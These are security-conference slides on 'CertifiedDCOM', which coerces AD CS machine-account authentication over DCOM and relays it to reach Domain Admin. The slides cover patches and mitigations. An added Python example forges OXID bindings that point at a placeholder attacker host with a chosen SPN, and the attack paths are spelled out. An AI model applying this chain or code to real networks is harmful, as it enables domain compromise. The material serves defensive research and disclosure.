Asia-24-Ding-CertifiedDCOM-The-Privilege-Escalation-Journey-to-Domain-Admin.pdf (Black Hat Asia 2024 slides, 51 pages)
CertifiedDCOM: The Privilege Escalation Journey to Domain Admin with DCOM
Tianze Ding (D1iv3), Tencent Security Xuanwu Lab
#BHASIA BlackHatEvents

Whoami
- Tianze Ding (D1iv3), Senior Security Researcher, Tencent Security Xuanwu Lab
- Focusing on Active Directory Security / Cloud Security / Web Security
- 2022 MSRC Most Valuable Researchers
- Black Hat / DEFCON / HITB speaker

Agenda
- COM/DCOM Basics
- Previous Research
- COM Attack Surface from Local to Remote
- CertifiedDCOM: Privilege Escalation to Domain Admin
- Patches & Mitigations
- Conclusions & Takeaways

What is COM?
- Component Object Model (COM). COM is everywhere: OLE, ActiveX, DirectX, Windows Runtime, WMI, etc.
- COM Server: DLL/EXE files with one or more COM classes
- COM Object: an instance of a COM class which implements one or more interfaces
- COM Interface: a set of methods that can be invoked by clients
- (Diagram: a COM server hosts a COM object that exposes IUnknown (QueryInterface, AddRef, Release) and Interface A (Method A, Method B))

COM/DCOM
- In-Process Server: runs in the same process as the client
- Out-of-Process Server: runs in a separate process; the client interacts with it through ALPC
- Remote Server (DCOM): runs on a remote computer; the client interacts with it through RPC
- (Diagram: Client Process [Application Code -> COM Proxy] <-- ALPC/RPC --> COM Server [COM Stub -> COM Object], for out-of-process and remote servers)

Out-of-process COM
1. The client requests a COM object from RPCSS (e.g., CoCreateInstance)
2. RPCSS creates a new process and a new COM object (Launch and Activation)
3. The COM server registers itself and returns activation info to RPCSS
4. RPCSS returns the activation info to the client
5. The client accesses COM interfaces and methods through ALPC (Access)

DCOM
1. The client on Computer A requests a COM object (e.g., CoCreateInstance)
2. RPCSS on Computer A requests the COM object from RPCSS on Computer B (port 135)
3. RPCSS on Computer B launches and activates the COM server
4. The client accesses the COM object through RPC (dynamic port)

Potato Attacks and Kerberos Relay
- Rotten Potato / Juicy Potato / Rogue Potato: Service Account to SYSTEM LPE
- Remote Potato: Domain User to SYSTEM / Other Local Sessions LPE
- Local Potato: Local User to SYSTEM LPE
- Kerberos Relay: Local User to SYSTEM LPE
- The beginning of the story: CoGetInstanceFromIStorage (MS15-076)
- Potato attacks and Kerberos Relay abuse COM activation for LPE. Is there a remote attack surface?

CoGetInstanceFromIStorage
- Windows APIs to create COM objects: CoGetClassObject, CoCreateInstance(Ex), CoCreateInstanceFromApp, CoGetInstanceFromFile, CoGetInstanceFromIStorage
- CoGetInstanceFromIStorage creates a new COM object and initializes it from a storage object; the pstg parameter is an interface pointer to the storage object

    HRESULT CoGetInstanceFromIStorage(
        [in, optional] COSERVERINFO *pServerInfo,
        [in, optional] CLSID        *pClsid,
        [in, optional] IUnknown     *punkOuter,
        [in]           DWORD        dwClsCtx,
        [in]           IStorage     *pstg,
        [in]           DWORD        dwCount,
        [in, out]      MULTI_QI     *pResults
    );

COM Marshaling/Unmarshaling
- Interface pointers must be marshaled into OBJREF structures whenever a call crosses an apartment, process or computer boundary
- EvilStorage *pstg implements IStorage and IMarshal; marshaling it calls IMarshal::GetUnmarshalClass and IMarshal::MarshalInterface, which produce an OBJREF_CUSTOM
- On the COM server side, unmarshaling creates the object named by the OBJREF_CUSTOM's CLSID and obtains the interface pointer from it
- OBJREF layout: MEOW signature, OBJREF type, IID. OBJREF_CUSTOM adds CLSID, cbExtension, Data Size, Data

COM Marshaling/Unmarshaling (PointerMoniker)
- The OBJREF_CUSTOM names the PointerMoniker class; PointerMoniker::UnmarshalInterface then unmarshals the embedded OBJREF_STANDARD
- OBJREF_STANDARD layout: MEOW signature, OBJREF type, IID, Flags, cPublicRefs, OXID (Object Exporter ID), OID, IPID, StringBindings, SecurityBindings
- StringBinding: TowerId, NetworkAddress. SecurityBinding: AuthnSvc, Reserved, Service Principal Name
- Unmarshaling an OBJREF_STANDARD: the COM server asks RPCSS to resolve the OXID (ResolveOxid2), which initiates an RPC connection to the address specified in the StringBinding

CoGetInstanceFromIStorage: the local attack (previous research)
1. The attacker's COM client calls CoGetInstanceFromIStorage(..., Clsid, EvilStorage, ...)
2. RPCSS performs Launch and Activation of the high-privileged COM server
3. The high-privileged COM server unmarshals the OBJREF and sends ResolveOxid2 over RPC to the attacker's rogue server
4. The rogue server returns OxidBindings (StringBindings and SecurityBindings)
5. The COM server opens a new COM connection to the address in the OxidBindings
6. The attacker impersonates the high-privileged user running the COM server, or relays its NTLM/Kerberos authentication to other services
- Previous research: the attacker's COM client and the victim COM server are on the same machine; the identities of high-privileged COM servers are impersonated or relayed for LPE; both connections (ResolveOxid2 and the new COM connection) require authentication

Remote CoGetInstanceFromIStorage
- Can we use CoGetInstanceFromIStorage to coerce a remote computer to connect to us over RPC/DCOM, and exploit that for an NTLM/Kerberos relay attack?
- CoGetInstanceFromIStorage also supports remote COM activation: pServerInfo carries the remote computer name and the remote auth info, and dwClsCtx set to CLSCTX_REMOTE_SERVER (enum tagCLSCTX) selects remote activation

    typedef struct _COSERVERINFO {
        DWORD       dwReserved1;
        LPWSTR      pwszName;      // remote computer name
        COAUTHINFO *pAuthInfo;     // remote auth info
        DWORD       dwReserved2;
    } COSERVERINFO;

- Suppose an attacker has Domain User / Domain Computer privileges and uses CoGetInstanceFromIStorage to activate a COM object on a remote domain computer: Access is Denied

COM Security
- COM Launch, Activation and Access are checked against a system-wide ACL and a process-wide ACL
- The system-wide Launch and Activation Limits are defined in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole
- By default, only users in specific high-privileged local groups are allowed to perform Remote Launch and Remote Activation

Remote Attack Surface?
- Low-privileged accounts (e.g., Domain Users, Domain Computers) are not allowed to activate any COM object on a remote computer under the Windows default COM security configuration
- Where is the remote attack surface?

Remote Attack Surface in Active Directory
- Windows: the default COM security configuration and the COM classes preinstalled in Windows
- Active Directory: widely used services in Active Directory, the COM classes introduced by these services, and the special COM security configuration introduced by these services

Special COM Security Configuration: RDS (Remote Desktop Services)
- Widely used by enterprise virtual application/desktop solutions, e.g., Citrix, VMware Horizon
- RDS Remote Access Servers, RDS Endpoint Servers and RDS Management Servers have Remote Launch and Remote Activation privileges
- In the RDS default configuration there are no low-privilege domain accounts in these groups

Special COM Security Configuration: SCCM (System Center Configuration Manager)
- The SMS Admins group has Remote Launch and Remote Activation privileges
- By default, each administrative user in a hierarchy and the site server computer account are members of the SMS Admins group
- There are no low-privilege domain accounts in the SMS Admins group

Special COM Security Configuration: AD CS (Active Directory Certificate Services)
- The Certificate Service DCOM Access group has the Remote Activation privilege
- The Authenticated Users group is a member of the Certificate Service DCOM Access group
- By default, any domain account therefore passes the system-wide ACL check and is allowed to activate COM objects remotely on AD CS
- Background: https://posts.specterops.io/certified-pre-owned-d95910965cd2
- Certificate Signing Request (CSR) protocols: MS-WCCE (DCOM), MS-ICPR (MS-RPC), HTTP
- The special configuration exists for MS-WCCE, to allow any domain account to send a CSR to AD CS over DCOM

Find Exploitable COM Classes on AD CS: process-wide security
- Process-wide security covers the process-wide ACL, the identity, the authentication level and the impersonation level
- Registry: defined under HKEY_CLASSES_ROOT\AppID\{AppID_GUID}
- CoInitializeSecurity API: a COM server can call it explicitly to override the configuration in the registry

Find Exploitable COM Classes on AD CS: what kind of exploitable COM class do we need?
- COM servers that are already launched: the Certificate Service DCOM Access group does not have the Remote Launch privilege in the AD CS system-wide ACL
- A process-wide ACL that allows remote activation by low-privileged domain accounts
- The process-wide ACL for Launch/Activation/Access is defined in the LaunchPermission and AccessPermission registry values
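The LaunchPermission and AccessPermission values (like the system-wide MachineLaunchRestriction and MachineAccessRestriction values under the Ole key) are stored as REG_BINARY self-relative security descriptors, so answering "who may activate this AppID remotely" means decoding a DACL and testing the COM_RIGHTS_ACTIVATE_REMOTE bit. The Python below is an added example, not code from the talk: it builds a constructed sample descriptor, parses the DACL, and lists the SIDs granted Remote Activation. The COM_RIGHTS_* values are the Windows SDK definitions; the sample SIDs are constructed placeholders; treating an ACE that sets only the legacy COM_RIGHTS_EXECUTE bit as granting every launch/activation right is this example's assumption; read_registry_permission is Windows-only and is not exercised offline.

```python
"""Triage the self-relative SECURITY_DESCRIPTOR stored in COM permission registry values.

Added example (not from the talk). LaunchPermission / AccessPermission under
HKCR\\AppID\\{AppID_GUID} and MachineLaunchRestriction / MachineAccessRestriction under
HKLM\\SOFTWARE\\Microsoft\\Ole are REG_BINARY self-relative security descriptors whose
access mask uses the COM_RIGHTS_* bits from the Windows SDK (iaccess.h).
"""
import struct
import sys

COM_RIGHTS_EXECUTE = 0x01          # legacy bit (see effective_mask)
COM_RIGHTS_EXECUTE_LOCAL = 0x02    # Local Launch (LaunchPermission) / Local Access (AccessPermission)
COM_RIGHTS_EXECUTE_REMOTE = 0x04   # Remote Launch (LaunchPermission) / Remote Access (AccessPermission)
COM_RIGHTS_ACTIVATE_LOCAL = 0x08   # Local Activation
COM_RIGHTS_ACTIVATE_REMOTE = 0x10  # Remote Activation
ACCESS_ALLOWED_ACE_TYPE, ACCESS_DENIED_ACE_TYPE = 0x00, 0x01
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
EVERYONE = "S-1-1-0"
WELL_KNOWN = {EVERYONE: "Everyone", "S-1-5-11": "Authenticated Users", "S-1-5-18": "SYSTEM",
              "S-1-5-32-544": "Administrators", "S-1-5-32-562": "Distributed COM Users"}


def sid_to_bytes(sid):
    rev, auth, *subs = (int(p) for p in sid.split("-")[1:])
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def sid_from_bytes(buf, off):
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d%s" % (rev, auth, "".join("-%d" % s for s in subs))


def build_sd(aces):
    """Constructed sample input: a self-relative SD holding only a DACL (owner, group and
    SACL absent). aces = [(ace_type, access_mask, sid_string)]; None builds a NULL DACL."""
    if aces is None:
        return struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE, 0, 0, 0, 0)
    body = b""
    for ace_type, mask, sid in aces:
        s = sid_to_bytes(sid)
        body += struct.pack("<BBHI", ace_type, 0, 8 + len(s), mask) + s   # ACE header, mask, SID
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(body), len(aces), 0) + body  # ACL header
    return struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20) + acl


def dacl_aces(sd):
    """(ace_type, mask, sid) for each allow/deny ACE; None when the DACL is NULL (everyone allowed)."""
    rev, _sbz, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative SECURITY_DESCRIPTOR")
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return None
    _rev, _sbz, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    aces, pos = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type in (ACCESS_ALLOWED_ACE_TYPE, ACCESS_DENIED_ACE_TYPE):
            mask = struct.unpack_from("<I", sd, pos + 4)[0]
            aces.append((ace_type, mask, sid_from_bytes(sd, pos + 8)))
        pos += ace_size  # ace_size also skips object/callback ACE types this triage does not interpret
    return aces


def effective_mask(mask):
    # Assumption of this example: an ACE that sets only the legacy COM_RIGHTS_EXECUTE bit
    # is read as granting all local and remote launch/activation rights.
    return 0x1F if mask == COM_RIGHTS_EXECUTE else mask


def remote_activators(sd):
    """SIDs granted COM_RIGHTS_ACTIVATE_REMOTE by an allow ACE and not named by a deny ACE.
    Triage only: ACE ordering and group membership are ignored, so resolve the SIDs by hand."""
    aces = dacl_aces(sd)
    if aces is None:
        return [EVERYONE]
    allowed, denied = [], set()
    for ace_type, mask, sid in aces:
        if effective_mask(mask) & COM_RIGHTS_ACTIVATE_REMOTE:
            if ace_type == ACCESS_DENIED_ACE_TYPE:
                denied.add(sid)
            else:
                allowed.append(sid)
    return [s for s in allowed if s not in denied]


def read_registry_permission(appid_guid, value="LaunchPermission"):
    """Windows only: the REG_BINARY descriptor from HKCR\\AppID\\{guid}\\<value>."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, r"AppID\%s" % appid_guid) as key:
        data, _kind = winreg.QueryValueEx(key, value)
    return data


if __name__ == "__main__":
    if len(sys.argv) > 1:  # on Windows: python com_perms.py "{AppID-GUID}" [LaunchPermission|AccessPermission]
        sd = read_registry_permission(*sys.argv[1:3])
    else:                  # constructed sample: a domain group (placeholder SID) loosened to Remote Activation
        sd = build_sd([
            (ACCESS_ALLOWED_ACE_TYPE, 0x1F, "S-1-5-32-544"),
            (ACCESS_ALLOWED_ACE_TYPE, COM_RIGHTS_EXECUTE_LOCAL | COM_RIGHTS_ACTIVATE_LOCAL, "S-1-5-18"),
            (ACCESS_ALLOWED_ACE_TYPE, COM_RIGHTS_EXECUTE_LOCAL | COM_RIGHTS_ACTIVATE_LOCAL
             | COM_RIGHTS_ACTIVATE_REMOTE, "S-1-5-21-1111111111-2222222222-3333333333-1130"),
        ])
    for sid in remote_activators(sd):
        print("Remote Activation granted to", WELL_KNOWN.get(sid, sid))
```

The same parser applies to the Ole MachineLaunchRestriction value, which is where the AD CS "Certificate Service DCOM Access" grant lives; the ACE for that group shows Remote Activation without Remote Launch, matching the slide's observation that only already-running servers are reachable.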

Find Exploitable COM Classes on AD CS: identity
- The identity is defined in the RunAs registry value: the user the COM server runs as
- We need COM servers whose identity can perform network authentication, which is any identity except Local Service, which uses the anonymous user for network authentication
- The Interactive User: uses the user that is currently logged on to the computer for authentication
- The system account: uses the domain computer account for network authentication

Find Exploitable COM Classes on AD CS: authentication and impersonation level
- Authentication Level is defined in the AuthenticationLevel registry value; the default is RPC_C_AUTHN_LEVEL_CONNECT, which means no signing and sealing in DCOM connections
- Impersonation Level: the default is RPC_C_IMP_LEVEL_IDENTIFY, which means the server cannot impersonate the client
- What each relay target needs from the relayed DCOM authentication:

    Target of Relay Attack   Authentication Level            Impersonation Level
    LDAP/LDAPS               <= RPC_C_AUTHN_LEVEL_CONNECT    RPC_C_IMP_LEVEL_IDENTIFY
    SMB                      <= RPC_C_AUTHN_LEVEL_CONNECT    RPC_C_IMP_LEVEL_IMPERSONATE
    AD CS HTTP(S)            <= RPC_C_AUTHN_LEVEL_CONNECT    RPC_C_IMP_LEVEL_IMPERSONATE
    AD CS MS-ICPR            <= RPC_C_AUTHN_LEVEL_CONNECT    RPC_C_IMP_LEVEL_IMPERSONATE

Exploitable COM Classes on AD CS

    Name             CLSID                                  Identity  Authentication Level  Impersonation Level
    CertSrv Request  d99e6e74-fc88-11d0-b498-00a0c90312f3   SYSTEM    CONNECT               IDENTIFY
    CertSrv Admin    d99e6e73-fc88-11d0-b498-00a0c90312f3   SYSTEM    CONNECT               IDENTIFY
    OCSPRequestD     3ab092c4-de6a-4dc4-be9e-fdacbb05759c   SYSTEM    CONNECT               IDENTIFY
    OCSPAdminD       6d5ad135-1730-4f19-a4eb-3f78e7c976bb   SYSTEM    CONNECT               IDENTIFY

- CertSrv Request and CertSrv Admin are installed on AD CS by default for MS-WCCE; OCSPRequestD and OCSPAdminD are introduced by the AD CS Online Responder role
- All of them run as SYSTEM and therefore use the ADCS$ computer account for network authentication; the plan is to relay ADCS$'s authentication messages to LDAP(S)

DCOM with ADCS$'s NTLM/Kerberos authentication messages
1. Attacker -> AD CS: remote CoGetInstanceFromIStorage, activating an exploitable COM object on AD CS
2. AD CS -> attacker: ResolveOxid2 over MS-RPC
3. Attacker -> AD CS: OxidBindings. In the SecurityBinding, AuthnSvc can be set to NTLM or Kerberos and PrincName can be set to any SPN
4. AD CS -> attacker: a DCOM connection authenticated as ADCS$. The authentication in this DCOM connection adheres to the process-wide security configuration of the exploitable COM class
5. Attacker -> Domain Controller: NTLM Relay / Remote Kerberos Relay of ADCS$'s authentication messages to LDAP(S), followed by an RBCD or Shadow Credentials attack

Privilege Escalation to Domain Admin
- Attack Path #1: use S4U2Self/S4U2Proxy to request a domain admin's service ticket to the AD CS server; get RCE on the AD CS server with PSEXEC, WMIEXEC or WINRM and dump the CA private key; escalate to Domain Admin with the Golden Certificate attack
- Attack Path #2: use S4U2Self/S4U2Proxy to request a domain admin's service ticket to the AD CS server; use it to request a certificate for the domain admin with MS-WCCE/MS-ICPR; use the domain admin's certificate to request a TGT with PKINIT; escalate to Domain Admin with the TGT

Demo
- https://youtu.be/OHwjeGUSM4w

Patch and Mitigation
- Patch for CVE-2022-37976, released on October 11, 2022: raised the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY in the Certificate Service
- DCOM Authentication Hardening, released on November 8, 2022: the update automatically raises the authentication level for all non-anonymous activation requests from DCOM clients to RPC_C_AUTHN_LEVEL_PKT_INTEGRITY if it is below Packet Integrity
- Enable protection against relay attacks: LDAP Signing and Channel Binding

Can We Relay to Other Services?
- Relaying to AD CS HTTP(S), SMB or MS-ICPR requires the impersonation level of the authentication to be RPC_C_IMP_LEVEL_IMPERSONATE; no remotely activatable COM class on AD CS satisfies this requirement
- Can we relay the authentication in the ResolveOxid2 RPC connection instead? (Attacker -> AD CS: remote CoGetInstanceFromIStorage; AD CS -> attacker: ResolveOxid2 over MS-RPC)
- rpcss.dll!ResolveClientOXID: the impersonation level of the ResolveOxid2 RPC authentication is RPC_C_IMP_LEVEL_IMPERSONATE
- NTLM Relay: we can relay ADCS$'s NTLM authentication messages from the ResolveOxid2 RPC to another AD CS server's HTTP or MS-ICPR endpoint (MS-ICPR only without the IF_ENFORCEENCRYPTICERTREQUEST flag). This requires two AD CS servers in the domain, because NTLM cannot be relayed back to the same machine

Kerberos Relay?
- The SPN in the ResolveOxid2 RPC authentication is forced to RPCSS/MachineNameFromStringBinding (rpcss.dll!ResolveClientOXID), so the SecurityBinding cannot be used to trigger a Kerberos relay on this connection
- Can we set an arbitrary SPN in the forged OBJREF's SecurityBinding (AuthnSvc, Reserved, Service Principal Name) at all?

RPC Protocol Sequence
- StringBinding: TowerId, NetworkAddress. The RPC sequence type (tower id) identifies the protocol to be used in RPC calls

    Tower Id   RPC Transport
    0x04       ncacn_dnet_nsp
    0x07       ncacn_ip_tcp
    0x08       ncadg_ip_udp
    0x09       ncacn_nb_tcp
    0x0C       ncacn_spx
    0x0D       ncacn_nb_ipx
    0x0E       ncadg_ipx
    0x0F       ncacn_np
    0x10       ncalrpc
    0x13       ncacn_nb_nb
    0x16       ncacn_at_dsp
    0x17       ncadg_at_ddp
    0x1A       ncacn_vns_spp
    0x1D       ncadg_mq
    0x1F       ncacn_http
    0x21       ncacn_hvsocket

- TCP, UDP, SMB, NetBIOS, HTTP, MQ: can any of these protocols be abused for NTLM/Kerberos relay?
- In the attack flow, the ResolveOxid2 RPC from AD CS to the attacker can travel over ncacn_ip_tcp or ncacn_http, and the DCOM connection that follows the OxidBindings can use ncacn_ip_tcp, ncacn_http or ncacn_np
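The StringBinding/SecurityBinding pairs above travel inside the DUALSTRINGARRAY of the OBJREF_STANDARD that the rogue OXID resolver returns as OxidBindings (the same structure the PointerMoniker trick in the marshaling slides makes the server unmarshal). The Python below is an added example, not code from the talk or from any tool it cites: it builds an OBJREF_STANDARD whose StringBindings point at an attacker host over ncacn_ip_tcp and ncacn_http and whose SecurityBinding carries an attacker-chosen SPN, then parses it back, decoding tower ids with the table above. Field layouts follow MS-DCOM (OBJREF, STDOBJREF, DUALSTRINGARRAY); the host name, SPN, OXID and OID values are constructed placeholders. Whether the SPN is honoured is the point of the surrounding slides: the DCOM connection that follows the bindings uses it, while the ResolveOxid2 and ncacn_np authentications force RPCSS/ and CIFS/ SPNs regardless of what is marshaled here.

```python
"""Forge and decode the OBJREF_STANDARD a rogue OXID resolver returns as OxidBindings.

Added example (not from the talk or any tool it cites). Field layouts follow MS-DCOM:
OBJREF header, STDOBJREF and DUALSTRINGARRAY.
"""
import struct
import uuid

OBJREF_SIGNATURE = 0x574F454D      # the bytes "MEOW" read as a little-endian DWORD
OBJREF_STANDARD = 0x00000001
SORF_NOPING = 0x00001000           # STDOBJREF flag: no pinging required for this object
RPC_C_AUTHN_WINNT = 0x0A           # NTLM
RPC_C_AUTHN_GSS_KERBEROS = 0x10    # Kerberos
IID_IUNKNOWN = uuid.UUID("00000000-0000-0000-C000-000000000046")

# RPC tower identifiers -> protocol sequence (the table from the slides)
TOWER_NAMES = {
    0x04: "ncacn_dnet_nsp", 0x07: "ncacn_ip_tcp", 0x08: "ncadg_ip_udp", 0x09: "ncacn_nb_tcp",
    0x0C: "ncacn_spx", 0x0D: "ncacn_nb_ipx", 0x0E: "ncadg_ipx", 0x0F: "ncacn_np", 0x10: "ncalrpc",
    0x13: "ncacn_nb_nb", 0x16: "ncacn_at_dsp", 0x17: "ncadg_at_ddp", 0x1A: "ncacn_vns_spp",
    0x1D: "ncadg_mq", 0x1F: "ncacn_http", 0x21: "ncacn_hvsocket",
}


def _wstr(s):
    return s.encode("utf-16-le") + b"\x00\x00"


def _wstr_end(buf, start):
    """Index of the UTF-16 NUL that terminates the string beginning at `start`."""
    i = start
    while i + 1 < len(buf):
        if buf[i:i + 2] == b"\x00\x00":
            return i
        i += 2
    raise ValueError("unterminated UTF-16 string")


def build_dualstringarray(string_bindings, security_bindings):
    """string_bindings: [(tower_id, network_address)]; security_bindings: [(authn_svc, principal_name)]."""
    sb = b"".join(struct.pack("<H", t) + _wstr(a) for t, a in string_bindings) + b"\x00\x00"
    sec = b"".join(struct.pack("<HH", svc, 0xFFFF) + _wstr(p) for svc, p in security_bindings) + b"\x00\x00"
    # wNumEntries counts 16-bit units across both arrays; wSecurityOffset is where the security array starts
    return struct.pack("<HH", (len(sb) + len(sec)) // 2, len(sb) // 2) + sb + sec


def parse_dualstringarray(buf, off):
    num_entries, sec_off = struct.unpack_from("<HH", buf, off)
    body = buf[off + 4: off + 4 + 2 * num_entries]
    string_bindings, pos = [], 0
    while pos < 2 * sec_off:
        tower = struct.unpack_from("<H", body, pos)[0]
        if tower == 0:                      # array terminator
            break
        end = _wstr_end(body, pos + 2)
        string_bindings.append((tower, body[pos + 2:end].decode("utf-16-le")))
        pos = end + 2
    security_bindings, pos = [], 2 * sec_off
    while pos < 2 * num_entries:
        svc = struct.unpack_from("<H", body, pos)[0]
        if svc == 0:                        # array terminator
            break
        end = _wstr_end(body, pos + 4)      # skip wAuthnSvc and Reserved (0xFFFF)
        security_bindings.append((svc, body[pos + 4:end].decode("utf-16-le")))
        pos = end + 2
    return string_bindings, security_bindings, off + 4 + 2 * num_entries


def build_objref_standard(iid, oxid, oid, ipid, string_bindings, security_bindings):
    std = struct.pack("<IIQQ", SORF_NOPING, 1, oxid, oid) + ipid.bytes_le   # STDOBJREF, 40 bytes
    return (struct.pack("<II", OBJREF_SIGNATURE, OBJREF_STANDARD) + iid.bytes_le
            + std + build_dualstringarray(string_bindings, security_bindings))


def parse_objref_standard(buf):
    signature, kind = struct.unpack_from("<II", buf, 0)
    if signature != OBJREF_SIGNATURE or kind != OBJREF_STANDARD:
        raise ValueError("not an OBJREF_STANDARD")
    flags, refs, oxid, oid = struct.unpack_from("<IIQQ", buf, 24)
    sb, sec, _ = parse_dualstringarray(buf, 64)
    return {"iid": uuid.UUID(bytes_le=buf[8:24]), "flags": flags, "cPublicRefs": refs,
            "oxid": oxid, "oid": oid, "ipid": uuid.UUID(bytes_le=buf[48:64]),
            "string_bindings": [(TOWER_NAMES.get(t, "0x%02X" % t), a) for t, a in sb],
            "security_bindings": sec}


def rogue_bindings(attacker_host, spn, authn_svc=RPC_C_AUTHN_GSS_KERBEROS):
    """OxidBindings a rogue resolver would answer with: every StringBinding points at the attacker
    (ncacn_ip_tcp first, ncacn_http as fallback) and the SecurityBinding names an attacker-chosen SPN."""
    return [(0x07, attacker_host), (0x1F, attacker_host)], [(authn_svc, spn)]


if __name__ == "__main__":
    # Constructed values: the attacker host, SPN, OXID and OID are placeholders, not from the talk.
    sb, sec = rogue_bindings("attacker.domain.local", "http/adcs.domain.local")
    blob = build_objref_standard(IID_IUNKNOWN, 0x1122334455667788, 0x8877665544332211, uuid.uuid4(), sb, sec)
    for key, value in parse_objref_standard(blob).items():
        print("%-18s %s" % (key, value))
```

To point the DCOM connection at a named pipe instead, add a (0x0F, host) StringBinding; the slides explain why that path authenticates as the machine account with a forced CIFS/ SPN.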

RPC over HTTP (ncacn_http)
- DCOM supports both RPC over HTTP v1 and RPC over HTTP v2; the client tries RPC over HTTP v2 first and falls back to RPC over HTTP v1 if that fails
- RPC over HTTP v1: the client sends an HTTP RPC_CONNECT request, the server answers HTTP/1.1 200 OK, and raw RPC packets (RPC bind, RPC bind_ack, ...) follow on the same connection. There is no authentication in the HTTP layer; the authentication messages are in the RPC packets
- RPC over HTTP v2: the client opens an RPC_IN_DATA channel and an RPC_OUT_DATA channel (each answered with HTTP/1.1 200 Success), exchanges RPC RTS packets, and then sends the RPC bind / bind_ack and the rest of the RPC traffic through them. Again there is no authentication in the HTTP layer; the authentication messages are in the RPC packets
- The RPC authentication in ncacn_http works the same way as in ncacn_ip_tcp, so NTLM Relay / Kerberos Relay can be performed with the RPC packets inside the HTTP connections exactly as with RPC over ncacn_ip_tcp
- RPC over HTTP traffic may bypass some network restrictions or NDR devices

RPC over Named Pipe (ncacn_np)
- The DCOM connection also supports RPC over Named Pipe (ncacn_np)
- ncacn_np uses the identity of RPCSS (NETWORK SERVICE) for the network authentication in the SMB layer, i.e., the AD CS machine account
- The impersonation level of that authentication is SECURITY_IMPERSONATION, which means the client can be impersonated by the server
- NTLM Relay: we can relay ADCS$'s NTLM authentication messages from the SMB layer to another AD CS server's HTTP or MS-ICPR endpoint (MS-ICPR only without the IF_ENFORCEENCRYPTICERTREQUEST flag); this requires two AD CS servers in the domain
- Kerberos Relay: the SPN in the authentication is forced to CIFS/MachineNameFromStringBinding, so a Kerberos relay cannot be triggered

CVE-2022-37976 Patch Analysis
- certsrv.exe before and after the patch: the patch introduces InitializeComSecurity, called from MainWndProc, which calls CoInitializeSecurity
- The Authentication Level is set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY and the Impersonation Level is set to RPC_C_IMP_LEVEL_IMPERSONATE

Kerberos Reflection
- The patch for CVE-2022-37976 changed the impersonation level of the Certificate Service (CertSrv Request and CertSrv Admin) to RPC_C_IMP_LEVEL_IMPERSONATE
- NTLM Relay: with the patch, we can relay the DCOM authentication to AD CS HTTP / MS-ICPR running on a different machine
- Kerberos Reflection is not restricted: we can relay Kerberos back to the same AD CS server
- Flow (DCOM with ADCS$'s Kerberos AP-REQ messages):
  1. Attacker -> AD CS: remote CoGetInstanceFromIStorage with the CertSrv Request COM class
  2. AD CS -> attacker: ResolveOxid2 over MS-RPC
  3. Attacker -> AD CS: OxidBindings with StringBinding = the attacker's machine and SecurityBinding = http/adcs.domain.local
  4. AD CS -> attacker: a DCOM connection over ncacn_ip_tcp or ncacn_http carrying ADCS$'s Kerberos AP-REQ
  5. Attacker -> AD CS HTTP: relay the Kerberos AP-REQ to the AD CS HTTP endpoint and request a certificate for ADCS$

Mitigations
- AD CS HTTP endpoints: follow Microsoft's guide to enable EPA (Extended Protection for Authentication) on your AD CS HTTP endpoints; EPA protects them from both NTLM Relay and Kerberos Relay
- MS-ICPR: keep the default settings of MS-ICPR and do not remove the IF_ENFORCEENCRYPTICERTREQUEST flag

Black Hat Sound Bytes
- CertifiedDCOM: a remote attack surface of DCOM and AD CS; privilege escalation from Domain Users to Domain Admin
- Takes Kerberos Relay to the next level by making it a remote attack vector
- The attacks may also work against customized DCOM with misconfigurations
- Mitigations: update your AD CS to install the patch for CVE-2022-37976; update all your machines to enable DCOM Authentication Hardening; enable LDAP Signing and Channel Binding and enable EPA for AD CS HTTP; check your customized system-wide and process-wide COM security configurations

Acknowledgments
- James Forshaw (tiraniddo), Andrea Pierini (decoder_it), Antonio Cocomazzi (splinter_code), cube0x0. Standing on the shoulders of giants!

Thank You! Tianze Ding (D1iv3), Tencent Security Xuanwu Lab
